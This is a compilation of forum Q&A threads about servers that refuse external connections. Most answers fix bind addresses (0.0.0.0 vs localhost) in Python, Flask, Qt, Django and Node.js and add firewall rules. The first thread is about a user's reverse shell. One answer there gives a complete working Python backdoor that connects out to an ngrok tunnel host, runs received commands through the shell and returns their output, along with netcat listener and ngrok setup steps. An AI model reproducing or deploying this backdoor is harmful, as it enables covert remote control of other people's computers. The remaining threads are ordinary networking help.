I created a reverse shell with Python and I have a problem with port forwarding on my router.
I don't have a static IP.
In the router:
    Protocol: TCP
    Localipaddr: 192.168.1.10
    Localport: 8090
    Wanipaddr: ---
    Wanport: 8090
    state: enable
In my Python script I can't bind to my WAN IP address:
    ST.bind((Wanipaddr, 8090))
If I bind to localipaddr, my reverse shell client can't connect to the server.
What's the solution to my problem?
Thanks
If you want to use your backdoor to receive connections from outside the LAN, use ngrok.
Example:
1- Let's listen on port 4444:
    nc -lp 4444
2- After ngrok is installed, run this command:
    ngrok tcp 444
3- Now find the ngrok address
4- Use your ngrok address for the client to connect:
    # backdoor.py
    import socket, subprocess, os
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    HOST = '0.tcp.ngrok.io'
    PORT = 12969
    s.connect((HOST, PORT))
    while True:
        conn = s.recv(2048).decode()
        if conn[:3] == 'cd ':
            os.chdir(conn[3:])
            cmd = ''
        else:
            proc = subprocess.Popen(conn, stdout=subprocess.PIPE,stderr=subprocess.PIPE, stdin=subprocess.DEVNULL, shell=True)
            stdout, stderr = proc.communicate()
            cmd = stdout+stderr
        cmd += str('\n'+os.getcwd()).encode()
        s.send(cmd)
5- Now you can connect with anyone outside your network
It sounds like your router is configured to forward requests from the internet on port 8090 to your host (assuming you have the correct LAN IP). Perhaps just try binding to 0.0.0.0.
From Wikipedia, it fits this context:
A way to specify "any IPv4 address at all". It is used in this way when configuring servers (i.e. when binding listening sockets).
In other words, you're telling your server to essentially listen on every available network interface (on that port).
I have flask running in a daemon on my Raspi.
    @app.route("/cmd", methods=['POST', 'GET'])
    def cmd():
        if request.method == 'GET':
            order_obj = request.args.to_dict(flat=True)
        else:
            order_obj = request.get_json(force=True)
        response = jsonify(controller_obj.act_on_order(order_obj))
        response.headers.add('Access-Control-Allow-Origin', '*')
        return response

    app.run(port=8087, debug=config.DEBUG, use_reloader=False)
When I run this app, I can see it is listening on port 8087:
    pi@brs-tv:~/brs $ sudo netstat -lptu
    Active Internet connections (only servers)
    Proto Recv-Q Send-Q Local Address           Foreign Address         State       PID/Program name
    tcp        0      0 localhost:8087          0.0.0.0:*               LISTEN      4133/python
When I telnet to the port locally using localhost, it works fine.
    pi@brs-tv:~/brs $ telnet localhost 8087
    Trying ::1...
    Trying 127.0.0.1...
    Connected to localhost.
    Escape character is '^]'.
    GET /cmd
But when I telnet locally to its local address, I get connection refused:
    pi@brs-tv:~/brs $ telnet brs-tv.local 8087
    Trying 127.0.1.1...
    telnet: Unable to connect to remote host: Connection refused
Is this a Rpi thing, or a Flask thing?
It turns out it is a Flask thing.
host (Optional[str]) – the hostname to listen on. Set this to '0.0.0.0' to have the server available externally as well. Defaults to '127.0.0.1' or the host in the SERVER_NAME config variable if present.
So, fixing my Flask run call:
    app.run(host="0.0.0.0", port=config.CONTROLLERS[whoami]["port"],
            debug=config.DEBUG, use_reloader=False)
Now, my port is listening to the rest of the world:
    pi@brs-tv:~ $ sudo netstat -lptu
    Active Internet connections (only servers)
    Proto Recv-Q Send-Q Local Address           Foreign Address         State       PID/Program name
    tcp        0      0 0.0.0.0:8087            0.0.0.0:*               LISTEN      1213/python
I can also now connect from another machine:
    Ricos-vt220:~ % telnet brs-tv.local 8087
    Trying fe80::3d7:b64:bb26:14e0...
    telnet: connect to address fe80::3d7:b64:bb26:14e0: Connection refused
    Trying 192.168.86.29...
    Connected to brs-tv.local.
    Escape character is '^]'.
    GET /cmd
Contents of serverside.py:
    import socket
    s = socket.socket()
    host = "127.0.0.1"
    port = 9000
    s.bind((host, port))
    s.listen(5)
    while True:
        c, addr = s.accept()
        print 'Got connection from', addr
        c.send('Thank you for connecting')
        c.close()
Now when I open cmd and type
    telnet 127.0.0.1 9000
the server works perfectly fine.
cmd displays - Thank you for connecting
and the shell displays - Got connection from ('127.0.0.1', 54578)
But when I connect over the WAN and type the same command in cmd from another computer, while the server on my computer is running fine, it shows connection failed.
Why is this happening?
Edit: I am a beginner in networking, so please help me understand what's going wrong.
Because you're binding to 127.0.0.1 instead of an address on an external interface. Only the local computer can connect to this address, which is why it's called the "loopback address".
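The bind-address behaviour described in the answer above, as an added example that is not part of the original posts: it listens on a chosen address and checks which destination addresses of the same machine are accepted. The function names are illustrative, and the demo assumes Linux, where all of 127.0.0.0/8 is local, so 127.0.0.2 stands in for a second address of the host such as a LAN IP.

```python
import socket

def accepts(bind_host, connect_host, timeout=1.0):
    """Listen on bind_host (kernel-chosen port) and report whether a TCP
    connection addressed to connect_host on that port is accepted."""
    with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as srv:
        srv.bind((bind_host, 0))   # port 0: let the kernel pick a free port
        srv.listen(1)
        port = srv.getsockname()[1]
        with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as cli:
            cli.settimeout(timeout)
            try:
                cli.connect((connect_host, port))
                return True        # handshake completed by the listener
            except OSError:
                return False       # refused or timed out: no listener there

def scope_matrix(bind_hosts, connect_hosts):
    """Map (bind_host, connect_host) -> reachable for every combination."""
    return {(b, c): accepts(b, c) for b in bind_hosts for c in connect_hosts}

if __name__ == "__main__":
    # Assumption: Linux loopback semantics (127.0.0.2 is a local address).
    matrix = scope_matrix(["127.0.0.1", "0.0.0.0"], ["127.0.0.1", "127.0.0.2"])
    for (b, c), ok in matrix.items():
        print(f"bind {b:<9} connect {c:<9} -> {'accepted' if ok else 'refused'}")
```

A listener on one address refuses connections sent to any other address of the host, while 0.0.0.0 accepts on all of them, including interfaces that face untrusted networks.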
My computer's IP on the local network is 192.168.0.100, I start my QTcpServer with
    if (!tcpServer->listen(QHostAddress::LocalHost, 1234)) {
When I try to connect to it with netcat 192.168.0.100 1234, the connection is refused, but netcat localhost 1234 succeeds.
At the same time, if I listen with netcat -l -p 1234, I can connect on both 192.168.0.100 and localhost without any problem.
This has me scratching my head, why is it happening?
In order to accept connections from the outside, you have to listen on 0.0.0.0, not on 127.0.0.1 or localhost. The latter will only allow connections coming from the same machine. It's also the value of QHostAddress::LocalHost.
So change the first argument to QHostAddress::Any and it should work.
localhost is on a separate network interface.
You can use QHostAddress::Any to listen for external connections.
I'm running OS X Mountain Lion on a machine with local IP address 192.168.1.6 (as reported by both the Network utility and ifconfig) and am running a local (Django) development web server on port 8000 that I would like to connect to from a virtual machine running a guest OS on the same machine.
On the host OS (ie, OS X running on the metal of the machine w/ address 192.168.1.6) I can connect to my test web server through the browser by navigating to 127.0.0.1:8000; or localhost:8000; but not when using the machine's local IP address. Here's what makes this extra confusing:
The router is not filtering the ports; and, just to be sure, I've set it to explicitly forward ports 8000 and 22 to 192.168.1.6; And speaking of port 22,
When I start the SSH service, I can connect (from the command line) via ssh 192.168.1.6
It's not a browser issue, because I also can't telnet to 192.168.1.6 port 8000 (connection refused) while I can telnet to 127.0.0.1 port 8000, and I can also telnet to 192.168.1.6 port 22
The firewall is set to off (as reported in System Preferences) but to be extra safe, I've also set an ipfw rule to allow everything through
Here are the ipfw rules:
    00100 allow tcp from any to any dst-port 8000
    65535 allow ip from any to any
Here is additional confirmation that the port is, indeed, being listened to by my test server:
    netstat -an | grep 8000
    tcp4       0      0  127.0.0.1.8000         *.*                    LISTEN
So what's going on here? Somehow port 22 is being treated differently than port 8000, but every place I can think to look for those differences I can't find any. Why can't I get into this machine's port 8000 using its local IP address?
When you start the Django development server you need to give the address explicitly:
    python manage.py runserver 192.168.1.6:8000
Or if you want the server to run on all interfaces you can use:
    python manage.py runserver 0.0.0.0:8000
Otherwise, the Django development server defaults to running on the local interface only.
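An added example, not taken from any of the posts: the netstat listings in the Flask and Django questions above can be audited automatically to see which listeners are loopback-only and which are reachable from other hosts. The function names are illustrative; the first three listener lines in the sample are copied from the page and the last one is constructed.

```python
import ipaddress
import re

# Local-address column: "host:port" (Linux net-tools) or "host.port" (BSD/macOS).
LOCAL_ADDR = re.compile(r"^(?P<host>.+)[:.](?P<port>\d+)$")

# First three listener lines are copied from the page; the last is constructed.
SAMPLE = """\
Active Internet connections (only servers)
Proto Recv-Q Send-Q Local Address Foreign Address State PID/Program name
tcp 0 0 localhost:8087 0.0.0.0:* LISTEN 4133/python
tcp 0 0 0.0.0.0:8087 0.0.0.0:* LISTEN 1213/python
tcp4 0 0 127.0.0.1.8000 *.* LISTEN
tcp4 0 0 192.168.1.6.8000 *.* LISTEN
"""

def bind_scope(host):
    """Classify a bind host as 'loopback', 'all-interfaces' or 'specific'."""
    if host in ("*", "[::]"):
        return "all-interfaces"
    if host in ("localhost", "ip6-localhost"):
        return "loopback"
    try:
        ip = ipaddress.ip_address(host)
    except ValueError:
        return "specific"          # a hostname netstat resolved: one interface
    if ip.is_unspecified:          # 0.0.0.0 or ::
        return "all-interfaces"
    return "loopback" if ip.is_loopback else "specific"

def audit_listeners(netstat_text):
    """Return (host, port, scope) for each TCP socket in LISTEN state."""
    findings = []
    for line in netstat_text.splitlines():
        cols = line.split()
        if len(cols) < 6 or not cols[0].startswith("tcp") or "LISTEN" not in cols:
            continue
        m = LOCAL_ADDR.match(cols[3])
        if m:   # service-name ports (netstat without -n) are skipped
            findings.append((m["host"], int(m["port"]), bind_scope(m["host"])))
    return findings

def exposed(findings):
    """Listeners reachable from other hosts, i.e. not loopback-only."""
    return [f for f in findings if f[2] != "loopback"]

if __name__ == "__main__":
    for host, port, scope in audit_listeners(SAMPLE):
        print(f"{host}:{port:<6} {scope}")
```

Anything `exposed()` returns for a development server (Flask with `debug` enabled, Django `runserver`) is worth reviewing, since those servers are then reachable from every network the host is attached to.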
The problem for me was I accidentally quit the server whenever trying to copy the server address. So instead of using ctrl+C just write down the address into your browser.
I solved the issue. There are a few things you might be missing. Listing them below:
1. Once it starts the server, do not press Ctrl+C at all. You might be pressing it to copy the URL, and that accidentally closes the server, which might be why this is happening.
2. Instead of http://127.0.0.1:8000/, change the port number to http://127.0.0.1:8080/. That would work.
3. Try changing the firewall setting and allow the app.
4. Try opening it with different browsers and incognito too.
The above steps helped solve my issue. Hope they help you too. :)
I installed node.js on a hosted Apache server. The simple server I placed on the server runs fine, but when I go to the website I cannot see the website.
I initially tested this on my local machine and it works fine, but I need this on a production website. How can I do this?
My Node.js code
[code]
// Load the net module to create a tcp server.
var net = require('net');
// Setup a tcp server
var server = net.createServer(function (socket) {
    // Every time someone connects, tell them hello and then close the connection.
    socket.addListener("connect", function () {
        console.log("Connection from " + socket.remoteAddress);
        socket.end("Hello World\n");
    });
});
// Fire up the server bound to port 1337 on localhost
server.listen(1337, "localhost");
// Put a friendly message on the terminal
console.log("TCP server listening on port 1337 at localhost.");
[/code]
Then I run node test.js
Response : TCP server listening on port 1337 at localhost.
Then I go to www.mywebsite.com:1337
Oops! Google Chrome could not connect to www.mywebsite.com:1337
So I tried using the actual IP
    server.listen(1337, "xx.xx.xx.xx");
And the URL
    server.listen(1337, "http://mywebsite.com");
    // this actually broke the server immediately
So how can I do this?
You will need a firewall rule to allow incoming traffic.
    iptables -A INPUT -p tcp --dport 1337 -j ACCEPT
and do not bind to localhost, but on the port only:
    server.listen(1337/*, "localhost"*/);
http://nodejs.org/api/net.html#net_server_listen_port_host_backlog_callback
EDIT: This comments out the host, so your server will listen on all addresses (this is the same as:)
    server.listen(1337);
If you still encounter problems, this is most likely a firewall problem.